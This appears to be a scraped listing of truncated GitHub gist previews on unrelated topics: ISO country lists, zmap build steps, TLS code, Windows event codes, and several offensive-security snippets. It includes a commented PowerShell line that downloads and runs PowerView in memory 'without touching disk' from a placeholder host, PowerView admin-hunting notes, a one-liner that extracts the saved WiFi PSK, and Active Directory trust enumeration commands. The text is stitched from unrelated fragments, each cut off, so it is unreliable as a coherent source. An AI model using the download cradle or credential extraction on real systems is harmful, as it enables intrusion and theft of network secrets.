incredimike

// Lists of countries with ISO 3166 codes, presented in various formats.
// Last Updated: July 30, 2020

// If you're using PHP, I suggest checking out:
// https://github.com/thephpleague/iso3166
// or Laravel: https://github.com/squirephp/squire
// 
// JS developers can check out:
// https://www.npmjs.com/package/iso3166-2-db
//

HarmJ0y

# Import PowerView into memory without touching disk
# IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1')


###################################
# Hunting for Users
###################################

# search for administrator groups

jaredcatkinson

function Get-InjectedThread
{
    <# 
    
    .SYNOPSIS 
    
    Looks for threads that were created as a result of code injection.
    
    .DESCRIPTION
    

kingtuna

cd
mkdir work
cd work
git clone https://github.com/zmap/zmap.git
apt-get install build-essential cmake libgmp3-dev gengetopt libpcap-dev flex byacc libjson-c-dev pkg-config libunistring-dev
cd zmap
cmake .
make -j4
make install
cd

HarmJ0y

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

seamustuohy

# Bash Golf example that gets the WPA-PSK key from the WiFi network you are currently connected to.
# Beyond the basics (cut & grep) it uses network manager's CLI and python3

c='cut -d: -f2';g=grep;a=$(nmcli -t -f ACTIVE,SSID d w l|$g -E "^yes:"|$c);p=$(nmcli -s -t c show $a|$g psk:|$c);python3 -c "from hashlib import pbkdf2_hmac as p; from binascii import hexlify as h;print('PSK',h(p('sha1', b'$p', b'$a', 4096, dklen=32)).decode('ascii'))"

gdamjan

# -*- encoding: utf-8 -*-
# requires a recent enough python with idna support in socket
# pyopenssl, cryptography and idna

from OpenSSL import SSL
from cryptography import x509
from cryptography.x509.oid import NameOID
import idna

from socket import socket

mspalex

$reboot
bash: /sbin/reboot: Input/output error

$shutdown -r now
bash: /sbin/shutdown: Input/output error

#
# if the above reboot commands doesn't work try either forced reboot or shutdown
#

brianreitz

%%279 : Undefined Access (no effect) Bit 7
%%1536 : Unused message ID
%%1537 : DELETE
%%1538 : READ_CONTROL
%%1539 : WRITE_DAC
%%1540 : WRITE_OWNER
%%1541 : SYNCHRONIZE
%%1542 : ACCESS_SYS_SEC
%%1543 : MAX_ALLOWED
%%1552 : Unknown specific access (bit 0)

w00tc

Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts 

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()


Grab Forest Trusts.

([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()